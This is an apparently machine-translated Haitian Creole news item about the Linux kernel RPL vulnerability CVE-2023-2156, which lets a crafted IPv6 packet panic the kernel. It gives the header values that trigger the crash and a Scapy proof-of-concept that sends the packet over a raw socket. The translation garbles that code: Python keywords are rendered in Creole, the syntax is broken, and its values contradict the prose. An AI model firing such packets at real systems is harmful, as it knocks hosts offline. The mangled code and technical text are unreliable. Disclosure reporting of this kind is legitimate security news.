Yo te divilge enfòmasyon sou yon vilnerabilite ki pa korije (0-jou) (CVE-2023-2156) nan nwayo Linux la, ki pèmèt sispann sistèm nan pa voye pake IPv6 ki fèt espesyalman (pake-of-death). Pwoblèm lan parèt sèlman lè sipò pou pwotokòl RPL (Routing Protocol for Low-Power and Lossy Networks) pèmèt, ki enfim pa default nan distribisyon epi yo itilize sitou sou aparèy entegre ki opere nan rezo san fil ak pèt pake segondè.
Se vilnerabilite a ki te koze pa pwosesis kòrèk nan done ekstèn nan kòd la analiz pwotokòl RPL, ki mennen nan yon echèk afime ak nwayo a ale nan eta a panik. Lè w ap mete done yo jwenn nan analize header pake IPv6 RPL la nan estrikti k_buff (Socket Buffer), si jaden CmprI mete a 15, jaden Segleft a 1, ak CmprE a 0, vektè 48-byte ak adrès yo dekonprese. a 528 bytes ak parèt yon sitiyasyon kote memwa a atribye ba tanpon an pa ase. Nan ka sa a, fonksyon an skb_push, ki itilize pou pouse done nan estrikti a, tcheke pou enkomensurabilite ant gwosè a nan done yo ak tanpon an, jenere yon eta panik pou anpeche ekri pi lwen pase fwontyè tanpon an.
Egzanp esplwate: # Nou pral sèvi ak Scapy pou fè pake a soti nan scapy.all enpòte * enpòte priz # Sèvi ak IPv6 ki soti nan koòdone LAN ou DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Nou itilize sockets pou voye pake a sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Fè pake a # Kalite = 3 fè sa a yon pake RPL # Adrès yo gen 3 adrès, men paske CmprI se 15, # chak octet nan de premye adrès yo se trete kòm yon adrès konprese # Segleft = 1 pou deklanche anplifikasyon # lastentry = 0xf0 mete CmprI a 15 ak CmprE a 0 p = IPv6 (src = SRC_ADDR, dst = DST_ADDR) / IPv6ExtHdrSegmentRouting (type = 3, adrès: :", "a8::", "a7::"], segleft=6, lastentry=1xf0) # Voye move pake sa a sockfd.sendto(bytes(p), (DST_ADDR, 0))
Li enpòtan pou remake ke devlopè nwayo yo te avèti vilnerabilite a nan mwa janvye 2022 epi pandan 15 mwa ki sot pase yo, yo te eseye rezoud pwoblèm nan twa fwa, yo te pibliye plak an septanm 2022, oktòb 2022 ak avril 2023, men chak fwa yo te fikse yo. pa ase ak vilnerabilite a pa t 'kapab repwodui. Alafen, pwojè ZDI a, ki te kowòdone travay la pou ranje vilnerabilite a, te deside pibliye enfòmasyon detaye sou vilnerabilite a san yo pa tann yon ranje k ap travay disponib nan nwayo a.
Kidonk, vilnerabilite a toujou rete san pwoblèm. An patikilye, patch ki enkli nan nwayo 6.4-rc2 a pa efikas. Itilizatè yo konseye yo tcheke si pwotokòl la RPL pa itilize sou sistèm yo, sa ki ka fè lè l sèvi avèk kòmand sysctl -a | grep -i rpl_seg_enabled
Sous: opennet.ru